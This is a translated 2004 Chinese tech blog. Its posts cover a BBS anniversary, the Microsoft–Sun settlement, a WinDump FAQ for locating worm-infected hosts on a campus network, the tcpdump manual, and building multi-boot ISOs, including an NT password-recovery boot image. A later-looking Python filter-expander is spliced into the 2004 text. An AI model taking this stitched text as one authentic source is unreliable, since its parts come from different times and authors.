Subject Filter: Mail Delivery Mail Authentification Submit a Virus Sample Developement Mail Account Delivery Status Notification Re: hi MailServer Notification Protected Mail System important application Re: Proof of concept Re: Thank you for delivery Re: Delivery Protection I'm back! Re: your details ok... Fwd: Warning again Re: Your software Re: excel document Re: patched Re: read it immediately Re: Encrypted Mail Re: word document Re: Your picture Re: Question
More...Posted by windtear at 10:31 AM
April 6, 2004
Happy second birthday to my junk heap I Love Networking
From: windtear (back from the dead, do not disturb ※ never trust the network), Board: BBSMan_Dev
Subject: Happy birthday to the third BBS I started
Posted at: BBS SMTH (Tue Apr 6 23:43:37 2004), forwarded
That includes the cn.bbs.* junk heap, heh
Accounts this site can register: [20236] Accounts so far: [36] Users online now: [1/256] Since [2002-4-6], peak users: [6] Cumulative visits: [22719]
Enter account (enter `guest' to try, `new' to register):
The first: 28#27#, the LAN era
The second: 35#
The third: a low-profile site whose purpose is piling up junk
The second and third are both still running 24/7, and both reuse some things from the first
-- ---== Certified by God ==---
From: KCN (poison of poisons ~life so hard), Board: BoardManager
Subject: Re: Makes board management harder
Posted at: BBS SMTH (Mon Dec 29 14:33:45 2003), forwarded
windtear's character is trustworthy. Hmm...
※ Source: ·BBS SMTH smth.org·[FROM: 166.111.154.35]
More...Posted by windtear at 11:46 PM
Microsoft and Sun bury the hatchet: full cooperation to fight Linux together I Love Networking
The huge news of the past few days, hmm
http://tech.sina.com.cn/focus/microsoft_sun/index.shtml
Microsoft and Sun bury the hatchet: full cooperation to fight Linux together. On the settlement Microsoft and Sun reached on the 2nd, industry observers say the main reason the two old rivals could make peace is that Linux products have become their common enemy.
The feud between Sun and Microsoft:
2004-04-02 SUN receives US$1.6 billion from Microsoft; the ten-year lawsuit finally evaporates
2004-03-27 Sun endorses the European Commission's decision: Microsoft did not compete on merit
2004-01-18 US appeals court rules that Microsoft is entitled to challenge in Sun v. Microsoft
2003-12-22 Sun says Microsoft's withdrawal of old products forces customers to upgrade
2003-11-17 Suffering under Microsoft's monopoly, Sun and Real tell their tales of woe at a hearing
Important related topic: 2003-03-24 EU imposes a huge US$600 million fine on Microsoft
Recent financial results compared (USD): Microsoft Q2 2003 revenue 10 billion, net profit 1.55 billion; SUN Q2 2003 revenue 2.9 billion, net loss 125 million
Microsoft in China, milestones: 1992 Microsoft opens a Beijing office. 1993 Microsoft sets up the Microsoft Beijing test center. 1995 Microsoft (China) Co., Ltd. formally established; Microsoft China R&D Center established. 1996 Microsoft Shanghai branch and Guangzhou office established. 1998 Microsoft Greater China Technical Center set up in Shanghai; Microsoft invests to expand the Microsoft China R&D Center; Microsoft Research China established in Beijing. 1999 Microsoft invests to expand the Greater China Technical Support Center into the Microsoft Asia Technical Center. 2001 Microsoft Research China upgraded to Microsoft Research Asia; Microsoft Asia Technical Center upgraded to Microsoft Global Technical Center. 2002 Microsoft China becomes a member of the China Software Industry Association; Microsoft's first independent software company investment in China, Zhongguancun Software, established; Microsoft's first large-stake joint venture in China, Shanghai Wicresoft, established; the State Development Planning Commission and Microsoft sign a memorandum of understanding on China's largest foreign software cooperation project, worth over 6.2 billion yuan; Microsoft (China) Co., Ltd. settles in Chengdu, opening an office for southwest China.
Microsoft worldwide, milestones: 1975-04-04 Microsoft founded. 1979-01-01 Microsoft moves from Albuquerque, New Mexico to Bellevue, Washington. 1981-06-25 Microsoft incorporated. 1981-08-12 IBM launches the personal computer with Microsoft's 16-bit operating system MS-DOS 1.0. 1986-02-26 Microsoft moves its headquarters to Redmond, Washington. 1986-03-13 Microsoft goes public. 1990-05-22 Microsoft launches Windows 3.0. 1995-08-24 Microsoft launches Windows 95. 1995-12-07 Bill Gates announces Microsoft will fully support and develop the Internet. 1998-06-25 Microsoft launches Windows 98. 2000-02-17 Microsoft launches Windows 2000. 2000-06-22 Microsoft launches the Microsoft.NET strategy. 2001-10-25 Microsoft launches Windows XP. 2002-01-15 Bill Gates proposes the "Trustworthy Computing" concept, stressing that software product security is the top priority. 2002-01-15 Microsoft announces .NET enters its second phase.
Since its founding in 1982, Sun Microsystems (SUNW) has held one view, The Network Is The Computer[tm], which has driven Sun to become the leading supplier of network-enabled industrial hardware, software and services. Sun can be found in more than 170 countries and on the World Wide Web.
http://tech.sina.com.cn/it/2004-04-02/2131343433.shtml
SUN receives US$1.6 billion from Microsoft; the ten-year lawsuit finally evaporates
http://www.sina.com.cn 2004-04-02 21:31 Sina Technology
Sina Technology, Beijing time, the evening of April 2: SUN issued a formal statement announcing a settlement with Microsoft under which Microsoft pays US$1.6 billion, finally settling out of court the two sides' ten-year antitrust and patent litigation. Of the US$1.6 billion, US$700 million settles the long-running antitrust suit between Microsoft and SUN and the other US$900 million settles the patent dispute.
In addition, Microsoft and Sun announced a ten-year technical cooperation and licensing agreement so that their products can interoperate better. The agreement was announced after the two companies resolved their long-standing legal disputes by settlement.
SUN chairman and CEO Scott McNealy said in the statement that the final settlement lays a good foundation for further major cooperation, while customers can still choose freely between Microsoft and SUN. McNealy added that the settlement will spur new product development on both sides, and that seamless interoperation of their computing environments gives customers who want to integrate server products from multiple vendors more choice.
Microsoft CEO Steve Ballmer said in the statement that competition between Microsoft and SUN will intensify, but the settlement creates a basis for cooperation that benefits both companies and their customers.
The statement also stressed that Microsoft will set up a US$350 million good-faith fund to pay for each side's use of the other's patented technology. Sun and Microsoft agreed to pay each other royalties for technologies including Java and .NET; Microsoft pays US$350 million up front, and Sun will pay after integrating Microsoft technology into its server products.
Alongside the settlement, SUN announced a major personnel change, appointing Jonathan Schwartz president and chief operating officer, while McNealy keeps the titles of chairman and CEO.
SUN will spend US$475 million on lay-off costs over the next few quarters; the cuts are reported to reach 3,300 jobs.
SUN expects third fiscal quarter revenue of US$2.65 billion; Wall Street expects a loss of 6-8 cents per share. (compiled and translated by Cheng Xinchao)
More...Posted by windtear at 10:12 AM
5000 and 100000 I Love Networking
blog visits pass 5000
IPCN.org visits pass 100000
norton.ipcn.org visits pass 100000
More...Posted by windtear at 1:40 AM
Paper challenge: padding out the count with a Chinese core journal I Love Networking
Content
1. Research papers and research reports on computer science research and applications
2. New advances, results and techniques in computer applications in scientific experiments and modern management, including software and hardware development, networking, industrial design, signal and information processing, communications, multimedia, etc.
3. Introductions, brief reports and experience exchange on computer applications
Requirements
1. Mainly work results, <6000 characters
2. Title <20 Chinese characters (English title, names in pinyin); Chinese and English abstracts <200 Chinese characters; 3~8 keywords in Chinese and English
3. A4 paper, size-5 font, single-sided
4. No multiple submission; if no acceptance notice after 3 months, you may dispose of the manuscript freely
5. Author bio, ID number, mailing address, postcode, phone and E-Mail
6. Submission by post and by E-Mail supported
email: shiy@dsp.ac.cn
phone: 62554573
-----> case analysis
TP-83 Microcomputer Applications, since 1980, bimonthly, core journal
Case analysis, issue 2004.1: surveys and research 3; networks and communications 7; multimedia 3; software and hardware applications and development 14
More...Posted by windtear at 1:21 AM
April 5, 2004
WinDump vs. tcpdump - taking on the virus king I Love Networking
D:\>windump -h
windump version current-cvs.tcpdump.org, based on tcpdump version current-cvs.tcpdump.org
WinPcap version 3.0 alpha, based on libpcap version current-cvs.tcpdump.org
Usage: windump [-aAdDeflnNOpqRStuvxX] [-B size] [-c count] [ -C file_size ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ -E algo:secret ] [ expression ]
% tcpdump -h
tcpdump version 3.6.3
libpcap version 0.6
Usage: tcpdump [-adeflnNOpqRStuvxX] [-c count] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -U user ] [ -w file ] [ expression ]
From: windtear (win or lose, live life boldly), Board: THUNet
Subject: [Simple FAQ] How to tell who is infected
Posted at: BBS SMTH (Sun Nov 2 21:22:21 2003), forwarded
[Simple FAQ] How to tell who is infected
Q: How do I know who is infected?
A: Capture packets
Q: How do I capture packets?
A: WinDump
Q: Where is it?
A: http://windump.polito.it/
Q: I can't connect
A: Use a proxy, or http://ipcn.org/windump/WinDump.exe http://ipcn.org/windump/WinPcap_3_0.exe (if you don't want the alpha version: http://ipcn.org/windump/WinDump.v3.6.2.exe http://ipcn.org/windump/2.3-WinPcap.exe)
Q: How do I use it?
A: Install WinPcap_3_0.exe first, then WinDump.exe. Start -> Run %SystemRoot%, copy and paste WinDump.exe there; Start -> Run cmd; WinDump.exe -h
Q: I don't understand it
A: http://windump.polito.it/docs/manual.htm http://windump.polito.it/misc/faq.htm
A: WinDump.exe -nn icmp
21:06:50.845294 IP 166.111.168.203 > 166.111.169.255: icmp 72: echo request seq 16436
21:06:51.023851 IP 166.111.168.203 > 166.111.170.17: icmp 72: echo request seq 21044
21:06:51.063603 IP 166.111.168.203 > 166.111.170.21: icmp 72: echo request seq 22068
21:06:51.133730 IP 166.111.168.203 > 166.111.170.28: icmp 72: echo request seq 23860
21:06:51.163858 IP 166.111.168.203 > 166.111.170.31: icmp 72: echo request seq 24628
Q: Who is infected?
A: 166.111.168.203
Q: I only want the 238 subnet
A: WinDump.exe -nn icmp and src net 166.111.238.0/24
Q: How do I find out who the infected 166.111.168.203 is?
A: If it is a static IP: check the static IP allocation records. If not: ping 166.111.168.203, then arp -a, and find the MAC of 166.111.168.203:
166.111.168.203 00-50-ba-45-91-6f dynamic
00-50-ba-45-91-6f
Q: Then what?
A: On the 3900 (3300) or 1100 switch, look up which port it is on
A: --_--> 3900
Address found on port 17: Canonical address Type 00-50-ba-45-91-6f Dynamic
or ----> 3900www
Success! Address found on port 17
-----> 1100
Location VLAN ID Permanent
Unit 1 Port 12 1 No
Q: I can't
A: Mail sns_noc@mails.tsinghua.edu.cn
--
http://ipcn.org/ ipchina.org proxy/ftp/domain/search/whois/BBS/XO/speed/mail/vpn
35#BBS (35# has been the female graduate dormitory since 2003-08-25) telnet://bbs.35net.ipcn.org/ http://bbs.35net.ipcn.org/
or telnet://ipcn.org/ telnet://ipchina.org/, reachable from home and abroad, with extra services such as gateway hopping and personal collections
※ Source: ·BBS SMTH smth.org·[FROM: 166.111.154.35]
D:\>windump -n src net 166.111.168.0/22 and not src host 166.111.168.100
D:\>WinDump.exe -n udp port 1434
TCPDUMP(8)
NAME
 tcpdump - dump traffic on a network
SYNOPSIS
 tcpdump [ -adeflnNOpqRStuvxX ] [ -c count ] [ -F file ] [ -i interface ] [ -m module ] [ -r file ] [ -s snaplen ] [ -T type ] [ -U user ] [ -w file ] [ -E algo:secret ] [ expression ]
DESCRIPTION
 Tcpdump prints out the headers of packets on a network interface that match the boolean expression.
 Under SunOS with nit or bpf: To run tcpdump you must have read access to /dev/nit or /dev/bpf*.
 Under Solaris with dlpi: You must have read/write access to the network pseudo device, e.g. /dev/le.
 Under HP-UX with dlpi: You must be root or it must be installed setuid to root.
 Under IRIX with snoop: You must be root or it must be installed setuid to root.
 Under Linux: You must be root or it must be installed setuid to root.
 Under Ultrix and Digital UNIX: Once the super-user has enabled promiscuous-mode operation using pfconfig(8), any user may run tcpdump.
 Under BSD: You must have read access to /dev/bpf*.
OPTIONS
 -a Attempt to convert network and broadcast addresses to names.
 -c Exit after receiving count packets.
 -d Dump the compiled packet-matching code in a human readable form to standard output and stop.
 -dd Dump packet-matching code as a C program fragment.
 -ddd Dump packet-matching code as decimal numbers (preceded with a count).
 -e Print the link-level header on each dump line.
 -E Use algo:secret for decrypting IPsec ESP packets.
Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3-cbc, cast128-cbc, or none. The default is des- cbc. The ability to decrypt packets is only pre- sent if tcpdump was compiled with cryptography enabled. secret the ascii text for ESP secret key. We cannot take arbitrary binary value at this moment. The option assumes RFC2406 ESP, not RFC1827 ESP. The option is only for debugging pur- poses, and the use of this option with truly `secret' key is discouraged. By presenting IPsec secret key onto command line you make it visible to others, via ps(1) and other occasions. -f Print `foreign' internet addresses numerically rather than symbolically (this option is intended to get around serious brain damage in Sun's yp server -- usually it hangs forever translating non- local internet numbers). -F Use file as input for the filter expression. An additional expression given on the command line is ignored. -i Listen on interface. If unspecified, tcpdump searches the system interface list for the lowest numbered, configured up interface (excluding loop- back). Ties are broken by choosing the earliest match. On Linux systems with 2.2 or later kernels, an interface argument of ``any'' can be used to cap- ture packets from all interfaces. Note that cap- tures on the ``any'' device will not be done in promiscuous mode. -l Make stdout line buffered. Useful if you want to see the data while capturing it. E.g., ``tcpdump -l | tee dat'' or ``tcpdump -l > dat & tail -f dat''. -n Don't convert host addresses to names. This can be used to avoid DNS lookups. -nn Don't convert protocol and port numbers etc. to names either. -N Don't print domain name qualification of host names. E.g., if you give this flag then tcpdump will print ``nic'' instead of ``nic.ddn.mil''. -m Load SMI MIB module definitions from file module. This option can be used several times to load sev- eral MIB modules into tcpdump. -O Do not run the packet-matching code optimizer. 
This is useful only if you suspect a bug in the optimizer. -p Don't put the interface into promiscuous mode. Note that the interface might be in promiscuous mode for some other reason; hence, `-p' cannot be used as an abbreviation for `ether host {local-hw- addr} or ether broadcast'. -q Quick (quiet?) output. Print less protocol infor- mation so output lines are shorter. -r Read packets from file (which was created with the -w option). Standard input is used if file is ``-''. -R Assume ESP/AH packets to be based on old specifica- tion (RFC1825 to RFC1829). If specified, tcpdump will not print replay prevention field. Since there is no protocol version field in ESP/AH speci- fication, tcpdump cannot deduce the version of ESP/AH protocol. -s Snarf snaplen bytes of data from each packet rather than the default of 68 (with SunOS's NIT, the mini- mum is actually 96). 68 bytes is adequate for IP, ICMP, TCP and UDP but may truncate protocol infor- mation from name server and NFS packets (see below). Packets truncated because of a limited snapshot are indicated in the output with ``[|proto]'', where proto is the name of the protocol level at which the truncation has occurred. Note that taking larger snapshots both increases the amount of time it takes to process packets and, effectively, decreases the amount of packet buffering. This may cause packets to be lost. You should limit snaplen to the smallest number that will capture the protocol information you're interested in. Setting snaplen to 0 means use the required length to catch whole packets. -S Print absolute, rather than relative, TCP sequence numbers. -t Don't print a timestamp on each dump line. -tt Print an unformatted timestamp on each dump line. -ttt Print a delta (in micro-seconds) between current and previous line on each dump line. -tttt Print a timestamp in default format proceeded by date on each dump line. -U Drops root privileges and changes user ID to user and group ID to the primary group of user. 
Note! Red Hat Linux automatically drops the privi- leges to user ``pcap'' if nothing else is speci- fied. -T Force packets selected by "expression" to be inter- preted the specified type. Currently known types are cnfp (Cisco NetFlow protocol), rpc (Remote Pro- cedure Call), rtp (Real-Time Applications proto- col), rtcp (Real-Time Applications control proto- col), snmp (Simple Network Management Protocol), vat (Visual Audio Tool), and wb (distributed White Board). -u Print undecoded NFS handles. -v (Slightly more) verbose output. For example, the time to live, identification, total length and options in an IP packet are printed. Also enables additional packet integrity checks such as verify- ing the IP and ICMP header checksum. SMB packets are also printed in full. -vv Even more verbose output. For example, additional fields are printed from NFS reply packets. -vvv Even more verbose output. For example, telnet SB ... SE options are printed in full. With -X telnet options are printed in hex as well. -w Write the raw packets to file rather than parsing and printing them out. They can later be printed with the -r option. Standard output is used if file is ``-''. -x Print each packet (minus its link level header) in hex. The smaller of the entire packet or snaplen bytes will be printed. -X When printing hex, print ascii too. Thus if -x is also set, the packet is printed in hex/ascii. This is very handy for analysing new protocols. Even if -x is not also set, some parts of some packets may be printed in hex/ascii. expression selects which packets will be dumped. If no expression is given, all packets on the net will be dumped. Otherwise, only packets for which expres- sion is `true' will be dumped. The expression consists of one or more primitives. Primitives usually consist of an id (name or num- ber) preceded by one or more qualifiers. There are three different kinds of qualifier: type qualifiers say what kind of thing the id name or number refers to. 
Possible types are host, net and port. E.g., `host foo', `net 128.3', `port 20'. If there is no type qualifier, host is assumed.

dir qualifiers specify a particular transfer direction to and/or from id. Possible directions are src, dst, src or dst and src and dst. E.g., `src foo', `dst net 128.3', `src or dst port ftp-data'. If there is no dir qualifier, src or dst is assumed. For `null' link layers (i.e. point to point protocols such as slip) the inbound and outbound qualifiers can be used to specify a desired direction.

proto qualifiers restrict the match to a particular protocol. Possible protos are: ether, fddi, tr, ip, ip6, arp, rarp, decnet, tcp and udp. E.g., `ether src foo', `arp net 128.3', `tcp port 21'. If there is no proto qualifier, all protocols consistent with the type are assumed. E.g., `src foo' means `(ip or arp or rarp) src foo' (except the latter is not legal syntax), `net bar' means `(ip or arp or rarp) net bar' and `port 53' means `(tcp or udp) port 53'.

[`fddi' is actually an alias for `ether'; the parser treats them identically as meaning ``the data link level used on the specified network interface.'' FDDI headers contain Ethernet-like source and destination addresses, and often contain Ethernet-like packet types, so you can filter on these FDDI fields just as with the analogous Ethernet fields. FDDI headers also contain other fields, but you cannot name them explicitly in a filter expression. Similarly, `tr' is an alias for `ether'; the previous paragraph's statements about FDDI headers also apply to Token Ring headers.]

In addition to the above, there are some special `primitive' keywords that don't follow the pattern: gateway, broadcast, less, greater and arithmetic expressions. All of these are described below.

More complex filter expressions are built up by using the words and, or and not to combine primitives. E.g., `host foo and not port ftp and not port ftp-data'. To save typing, identical qualifier lists can be omitted. E.g., `tcp dst port ftp or ftp-data or domain' is exactly the same as `tcp dst port ftp or tcp dst port ftp-data or tcp dst port domain'.

Allowable primitives are:

dst host host
    True if the IPv4/v6 destination field of the packet is host, which may be either an address or a name.
src host host
    True if the IPv4/v6 source field of the packet is host.
host host
    True if either the IPv4/v6 source or destination of the packet is host.
    Any of the above host expressions can be prepended with the keywords ip, arp, rarp, or ip6 as in:
        ip host host
    which is equivalent to:
        ether proto \ip and host host
    If host is a name with multiple IP addresses, each address will be checked for a match.
ether dst ehost
    True if the ethernet destination address is ehost. Ehost may be either a name from /etc/ethers or a number (see ethers(3N) for numeric format).
ether src ehost
    True if the ethernet source address is ehost.
ether host ehost
    True if either the ethernet source or destination address is ehost.
gateway host
    True if the packet used host as a gateway. I.e., the ethernet source or destination address was host but neither the IP source nor the IP destination was host. Host must be a name and must be found in both /etc/hosts and /etc/ethers. (An equivalent expression is
        ether host ehost and not host host
    which can be used with either names or numbers for host / ehost.) This syntax does not work in IPv6-enabled configuration at this moment.
dst net net
    True if the IPv4/v6 destination address of the packet has a network number of net. Net may be either a name from /etc/networks or a network number (see networks(4) for details).
src net net
    True if the IPv4/v6 source address of the packet has a network number of net.
net net
    True if either the IPv4/v6 source or destination address of the packet has a network number of net.
net net mask mask
    True if the IP address matches net with the specific netmask. May be qualified with src or dst. Note that this syntax is not valid for IPv6 net.
net net/len
    True if the IPv4/v6 address matches net a netmask len bits wide. May be qualified with src or dst.
dst port port
    True if the packet is ip/tcp, ip/udp, ip6/tcp or ip6/udp and has a destination port value of port. The port can be a number or a name used in /etc/services (see tcp(4P) and udp(4P)). If a name is used, both the port number and protocol are checked. If a number or ambiguous name is used, only the port number is checked (e.g., dst port 513 will print both tcp/login traffic and udp/who traffic, and port domain will print both tcp/domain and udp/domain traffic).
src port port
    True if the packet has a source port value of port.
port port
    True if either the source or destination port of the packet is port.
    Any of the above port expressions can be prepended with the keywords tcp or udp, as in:
        tcp src port port
    which matches only tcp packets whose source port is port.
less length
    True if the packet has a length less than or equal to length. This is equivalent to: len <= length.
greater length
    True if the packet has a length greater than or equal to length. This is equivalent to: len >= length.
ip proto protocol
    True if the packet is an IP packet (see ip(4P)) of protocol type protocol. Protocol can be a number or one of the names icmp, icmp6, igmp, igrp, pim, ah, esp, udp, or

Posted by windtear at 12:56 AM
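The qualifier rules quoted above (type defaults to host, dir to "src or dst", proto to every protocol consistent with the type, and a bare id after and/or reusing the previous qualifier list) are easy to get wrong when a terse filter goes onto a sensor. The following Python expander, an example added here and not tcpdump code, spells a filter out primitive by primitive so the implicit parts become visible. It covers the host/net/port primitives with proto and dir qualifiers plus and/or/not and parentheses; the special primitives (gateway, broadcast, less, greater) are rejected rather than guessed at. The "(ip or arp or rarp)" form it prints for an implied proto is, as the man page says, illustrative rather than legal tcpdump syntax.

```python
"""Spell out the implicit qualifiers of a tcpdump filter expression,
following the rules in the man page text above (added example, not
tcpdump code: it expands the grammar, it does not compile it)."""
import re

TYPES = ("host", "net", "port")
DIRS = ("src", "dst")
PROTOS = ("ether", "fddi", "tr", "ip", "ip6", "arp", "rarp", "decnet", "tcp", "udp")
OPS = ("and", "or", "not", "(", ")")
SPECIAL = ("gateway", "broadcast", "less", "greater")   # not handled here

# Man page defaults: no type -> host; no dir -> "src or dst";
# no proto -> every protocol consistent with the type.
DEFAULT_PROTO = {"host": "ip or arp or rarp", "net": "ip or arp or rarp",
                 "port": "tcp or udp"}


def tokenize(expr):
    return re.findall(r"\(|\)|[^\s()]+", expr)


def _take_dir(toks, i):
    """'src', 'dst', or the compound 'src or dst' / 'src and dst'."""
    if i + 2 < len(toks) and toks[i + 1] in ("or", "and") and toks[i + 2] in DIRS:
        return " ".join(toks[i:i + 3]), i + 3
    return toks[i], i + 1


def expand(expr, spell_defaults=True):
    """Return expr with every primitive written as '[proto] dir type id'.
    With spell_defaults=False only the 'omitted qualifier list' shorthand
    is expanded, which is exactly what tcpdump's parser does."""
    toks = tokenize(expr)
    out, last, i = [], None, 0
    while i < len(toks):
        if toks[i] in OPS:
            out.append(toks[i])
            i += 1
            continue
        if toks[i] in SPECIAL:
            raise ValueError("special primitive not handled: " + toks[i])
        proto = dir_ = typ = None
        explicit = False
        while i < len(toks) and toks[i] in PROTOS + DIRS + TYPES:
            explicit = True
            if toks[i] in PROTOS:
                proto, i = toks[i], i + 1
            elif toks[i] in DIRS:
                dir_, i = _take_dir(toks, i)
            else:
                typ, i = toks[i], i + 1
        if i >= len(toks) or toks[i] in OPS:
            raise ValueError("qualifier without an id in: " + expr)
        ident, i = toks[i], i + 1
        if not explicit and last is not None:
            proto, dir_, typ = last        # bare id: reuse previous qualifier list
        last = (proto, dir_, typ)
        typ = typ or "host"
        parts = []
        if proto:
            parts.append(proto)
        elif spell_defaults:
            parts.append("(" + DEFAULT_PROTO[typ] + ")")   # illustrative only
        if dir_:
            parts.append(dir_)
        elif spell_defaults:
            parts.append("src or dst")
        parts += [typ, ident]
        out.append(" ".join(parts))
    return " ".join(out)


if __name__ == "__main__":
    for f in ("port 53", "src foo", "host foo and not port ftp and not port ftp-data",
              "tcp dst port ftp or ftp-data or domain"):
        print(f, "  ==>  ", expand(f))
```

Run it on a filter before deploying it: "port 53" on a DNS sensor also admits UDP/TCP traffic from port 53 in either direction, and "tcp dst port ftp or ftp-data or domain" silently carries "tcp dst" onto the other two ids, both of which the expander prints out.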
cdimage vs. mkisofs (+gbk+md5) - the multi-boot ISO challenge (我爱网络)
cdimage - Microsoft's internal ISO tool

-----> demo
cdimage -lWindows01 -d -h -n -o -m -bloader.bin F:\ISO-n-in-1\2000_tree e:\windows01.v0.003.iso

-----> autorun.inf
[AutoRun]
icon=autorun.ico
open=autorun.exe

-----> cdimage usage
CDIMAGE 2.39 CD-ROM Premastering Utility
Copyright (C) Microsoft, 1993-1997. All rights reserved.
For Microsoft internal use only.

Usage: CDIMAGE [options] sourceroot targetfile
  -l   volume label, no spaces (e.g. -lMYLABEL)
  -t   time stamp for all files and directories, no spaces, any delimiter (e.g. -t12/31/91,15:01:00)
  -g   encode GMT time for files rather than local time
  -h   include hidden files and directories
  -n   allow long filenames (longer than DOS 8.3 names)
  -nt  allow long filenames, restricted to NT 3.51 compatibility (-nt and -d cannot be used together)
  -d   don't force lowercase filenames to uppercase
  -c   use ANSI filenames versus OEM filenames from source
  -j1  encode Joliet Unicode filenames AND generate DOS-compatible 8.3 filenames in the ISO-9660 name space (can be read by either Joliet systems or conventional ISO-9660 systems, but some of the filenames in the ISO-9660 name space might be changed to comply with DOS 8.3 and/or ISO-9660 naming restrictions)
  -j2  encode Joliet Unicode filenames without standard ISO-9660 names (requires a Joliet operating system to read files from the CD)
       When using the -j1 or -j2 options, the -n, -nt, and -d options do not apply and cannot be used.
  -js  non-Joliet "readme.txt" file for images encoded with -j2 option (e.g. -jsc:\location\readme.txt). This file will be visible as the only file in the root directory of the disc on systems that do not support the Joliet format (Windows 3.1, NT 3.x, etc).
  -u1  encode "UDF" file system along with mirror ISO-9660 file system (-n, -nt, -d, -c, or -j1, -j2 options apply to ISO-9660 portion)
  -u2  encode "UDF" file system without a mirror ISO-9660 file system (requires a UDF capable operating system to read the files)
  -us  non-UDF "readme.txt" file for images encoded with -u2 option (e.g. -usc:\location\readme.txt). This file will be visible as the only file in the root directory of the disc on systems that do not support the UDF format.
  -b   "El Torito" boot sector file, no spaces (e.g. -bc:\location\cdboot.bin)
  -s   sign image file with digital signature (no spaces, provide RPC server and endpoint name like -sServerName:EndPointName)
  -x   compute and encode "AutoCRC" values in image
  -o   optimize storage by encoding duplicate files only once
  -oc  slower duplicate file detection using binary comparisons rather than MD5 hash values
  -oi  ignore diamond compression timestamps when comparing files
  -os  show duplicate files while creating image
       (-o options can be combined like -ocis)
  -w   warning level followed by number (e.g. -w4)
       1  report non-ISO or non-Joliet compliant filenames or depth
       2  report non-DOS compliant filenames
       3  report zero-length files
       4  report each file name copied to image
  -y   test option followed by number (e.g. -y1), used to generate non-standard variations of ISO-9660 for testing purposes:
       1  encode trailing version number ';1' on filenames (7.5.1)
       2  round directory sizes to multiples of 2K (6.8.1.3)
       5  write \i386 directory files first, in reverse sort order
       6  allow directory records to be exactly aligned at ends of sectors (ISO-9660 6.8.1.1 conformant but breaks MSCDEX)
       7  warn about generated shortnames for 16-bit apps under NT 4.0
       b  blocksize 512 bytes rather than 2048 bytes
       d  suppress warning for non-identical files with same initial 64K
  -k   (keep) create image even if fail to open some of the source files
  -m   ignore maximum image size of 681,984,000 bytes
  -a   allocation summary shows file and directory sizes
  -q   scan source files only, don't create an image file

NOTE: Many of these options allow you to create CD images that are NOT compliant with ISO-9660 and may also NOT be compatible with one or more operating systems. If you want strict ISO and DOS compliance, use the -w2 warning level and correct any discrepancies reported. YOU are responsible for insuring that any generated CDs are compatible with all appropriate operating systems. Also note that Microsoft company information is placed in the image volume header, so don't use this program to generate CDs for companies other than Microsoft.

-----> mkisofs
by ClearMind @ Thu Oct 11 18:18:43 2001

Basic CD burning support and basic commands
==========================
1. Using mkisofs
mkisofs -b images/boot.img -c boot.cat -J -r -T \
  -p "disc identifier" -P "disc preparer" -A "long disc identifier" -V "short disc identifier" \
  . -o disc-image.iso
2. Burning with cdrecord
cdrecord -v -dev=<burner device> -speed=<burn speed> -eject -fs=4m -data disc-image.iso
3. Building a multi-boot-image bootable CDROM image
mkisofs -J -r -T -R -relaxed-filenames -c boot.cat \
  -p "disc identifier" -P "disc preparer" -A "long disc identifier" -V "short disc identifier" \
  -b image1.img -eltorito-alt-boot \
  -b image2.img -eltorito-alt-boot \
  -b image3.img -eltorito-alt-boot \
  -b image4.img -eltorito-alt-boot \
  -hide-rr-moved -max-iso9660-filenames \
  -o disc-image.iso disc-content-directory/

-----> mkisofs win32 GBK md5
by Wwashington @ NewSoftware-7-11

Compared with Microsoft's CDImage it adds support for the Unix RockRidge and Apple HFS formats. When building system installation and maintenance discs it can be of enormous use. When we build the ISO in RockRidge format, the most typical application is support for hard-disk configuration (linux fdisk). Add an NT/2K password recovery entry (Bd011022.ima) via DiskEmu and you have a very capable Rescue CD-ROM. Before use, the ISO image you built must be written to a disc with a burning tool. Please read the documentation carefully after downloading.
...
A RockRidge+GBK+MD5 based MultiBoot + multi Windows XP + NTPwd + Mandrake Rescue disc ISO
...
The benefit is huge: with cdimage -o, a 3-XP-in-one disc needs about 2 GB of real disk space, and after the build you still delete the duplicate links by hand, which is crude. mkisofs -O instead decides file links by MD5 while scanning the directory structure, so however many XPs you merge into one, the working space needed is only what the optimized result needs. That part was done by COMMAN, go and thank him; I only did the MD5.
Product: mkisofs 1.15a23 +gbk +md5 (DEBUG version)
Author : Wwashington @ SMTH , Release: 2002/06/14
[Recommended] mkisofs win32 GBK edition V1.15a23 @ Wed May 29 04:40:58 2002
[Announcement] mkisofs 1.15a23 +gbk +md5 finished @ Thu May 30 20:08:54 2002
[Summary] mkisofs +gbk +md5 howto @ Sat Jun 1 05:53:09 2002
[Notice] ISO Maker 1.22 build 11 released @ Mon Jun 10 17:20:38 2002
[Great news] super-cool mkisofs md5 optimization done @ Fri Jun 14 11:16:07 2002
[Test build] super-cool mkisofs md5 optimization done @ Fri Jun 14 20:16:11 2002

---------------------------------------------------------------------------------
/*********** Howto build the latest mkisofs with gbk and md5 support ***********/
/************ Written by Wwashington in www.smth.edu.cn, 2002/06/01 ************/
---------------------------------------------------------------------------------
[A] File List.
(1) Type = Full Sources.
    What = The original files from joerg.schilling (A great man).
    Link = http://natural.chonnam.ac.kr/linux/mkisofs/mkisofs-1.12b5.tar.gz
    Link = ftp://ftp.fokus.gmd.de/pub/unix/cdrecord/alpha/cdrtools-1.11a23.tar.gz
(2) Type = Full Sources.
    What = v1.12b5, The 1st GBK made by dfbb, and 2nd Md5 made by COMMAN,
    Link = http://wwashington.51.net/files/friend/mkisofs/mkisofs-1.12b5.rar
(3) Type = Full Sources + Patches + Tools.
    What = v1.15a23, The 1st GBK made by Wwashington (learn from dfbb)
    Link = http://www.mesky.net/SoftDown/SoftView.Asp?SoftID=1271
(4) Type = Patches + Documents.
    What = v1.12b5, The 1st GBK patch by dfbb, and 2nd Md5 patch by COMMAN,
    What = v1.15a23, The 1st & 2nd patches by Wwashington, (learn from dfbb & COMMAN, add 2 new features, fix a GBK bug which forces lowercase.)
    Link = http://wwashington.51.net/files/myprod/mkisofs/mkisofs-gbk.md5.rar
(5) Type = Binary + Shell Program. (by Wwashington)
    What = ISO Maker 1.20 b10 including mkisofs 1.15a23 +gbk +md5
    Link = http://www.mesky.net/SoftDown/SoftView.Asp?SoftID=1280
(6) Type = Folders Introduction. (100% working, need to upgrade step by step)
    What = 1.12.b5_gbk, 1.12.b5_md5, 1.15.a23_gbk, 1.15.a23_md5
    Doc1 = Original --> 1.12.b5_gbk --> 1.12.b5_md5
    Doc2 = Original --> 1.15.a23_gbk --> 1.15.a23_md5
